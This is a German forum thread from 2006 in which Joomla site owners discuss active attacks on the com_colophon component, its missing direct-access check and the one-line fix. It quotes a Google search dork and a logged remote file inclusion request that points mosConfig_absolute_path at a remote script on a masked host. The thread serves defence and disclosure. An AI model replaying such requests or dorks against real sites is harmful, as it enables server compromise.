Hinweis/Frage zu com_colophon

**soltmann** · 29.07.2006 20:58

Guten Abend,

vielleicht ist es Panik, vielleicht aber auch übertriebene Vorsicht. In den letzten 12 Stunden wurde von den verschiedenensten Quellen über Google die Anfrage "inurl:"/com_colophon/" " gestartet. Zum Spaß macht man das nicht wirklich, kann zwar vorkommen, aber nicht von Google.com.tr, Google****, Google.de und Google.com in so kurzer Zeit. Gibt es in dieser Komponente auch noch ein Fehler?

Im Augenblick (29.07.06, 22:00Uhr) kann man diese Suchanfrage auf meiner Seite noch sehen (last_referer).

Wenn es ein Fehlalarm war oder das Thema hier schon 1000 mal durch ist, sorry.

Edit: Scheint gerade ne populäre Komponente zu sein, jetzt kommen auch noch Suchanfragen von Google.com.eg und Google.it dazu.

Mit freundlichem Gruß

Sven Soltmann

**ksghini** · 30.07.2006 07:25

In der letzten Nacht gab es auch auf meiner Seite an die 100 Aufrufe bezüglich colophon.
Zuerst über Google, danach waren auch gezielte Aufrufe dieser Komponente vorhanden von allen Möglichen Orten (Türkei, Brasilien usw.)!
Bis jetzt ist nichts passiert, aber etwas beunruhigend ist es schon.

**soltmann** · 30.07.2006 07:36

Irgendwas passiert aber anscheinend doch, siehe hier:
http://forum.joomla.org/index.php/to...html#msg416601
Schade das mein Englisch so schlecht ist.

Die "Herstellerwebseite" http://www.schoolastech.com/ ist leider derzeit auch nicht errreichbar.

Ich habe die Komponente erstmal unbrauchbar gemacht (hoffentlich).

Mit freundlichem Gruß

Sven Soltmann

**b2m** · 30.07.2006 09:49

Hi
Das lässt sich ganz einfach erklären:
Die admin.colophon.php ist buggy.
Da fehlt die Überprüfung ob die Datei auch von Joomla eingebunden wird => man kann die Datei direkt aufrufen und eure Installation hacken... zumindest habe ich so drei Installationen verloren *amaufräumenbin*.

Es fehlt da ein

Code:

// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );

im top der Seite.

ciao B2M

**amarok** · 30.07.2006 09:57

die install. und uninstall.colophon.php in administrator/components/com_colophon gleich mitsichern.

**soltmann** · 30.07.2006 10:04

Damit sollte man das Modul Colophon auch zuden unsicheren Module zählen oder ausdrücklich auf die Änderung hinweisen.
Vielen Dank

Edit: siehe Amarok, er war einfach schneller.

Mit freundlichem Gruß

Sven Soltmann

**Lucretia** · 30.07.2006 12:38

ja, meine Seite ist heute auch gleich 2 Mal (!!!) gehackt worden

Laut Logfiles scheint es an Colophon zu liegen.
Hab die Komponente erstmal rausgeschmissen, ist ja zum Glück nicht "lebenswichtig".

**ksghini** · 30.07.2006 13:29

Habe die Komponente auch schon deinstalliert, der Admin-Bereich ist zusätzlich mittels .htaccess geschützt, so konnte kein Schaden angerichtet werden.

Weitere Angrife gibt es auf folgende Komponente:
com_mgm, habe ich zwar nicht installiert, aber schon Zugriffe nach dem selben Muster wie auf die com_colophon erhalten.

**Lucretia** · 31.07.2006 11:02

hm, nachdem ich gestern sämtliche Bestandteile von Colophon gelöscht habe, bekomme ich laut Logfiles immer noch Anfragen nach

"GET /mtg/component/option,com_colophon/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://xxx/list.txt? HTTP/1.1" 200 24010 "-" "libwww-perl/5.805"

Sind das nur Hackversuche, oder muss ich mir Sorgen machen? Was kann dieses Script auf xxx ? Hat da jemand Ahnung von?
Meine Programmierkenntnisse reichen leider nicht aus, um den Zweck dieses Scriptes zu verstehen.
Wär super, wenn mir diesbezüglich jemand weiterhelfen könnte.

Danke!

headcrash · 31.07.2006 11:50

Das Script ist böse, im Endeffekt installiert es Dir u.a. einen Dateimanager auf dem Space, mit dem beliebig manipuliert werden kann.

Thema: Hinweis/Frage zu com_colophon

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Hinweis/Frage zu com_colophon

Kann ich bestätigen

com_colophon 1.2.0 hacked

Erhielt Danksagungen von:

und es geht weiter mit den Angrifen

Lesezeichen

Lesezeichen

Berechtigungen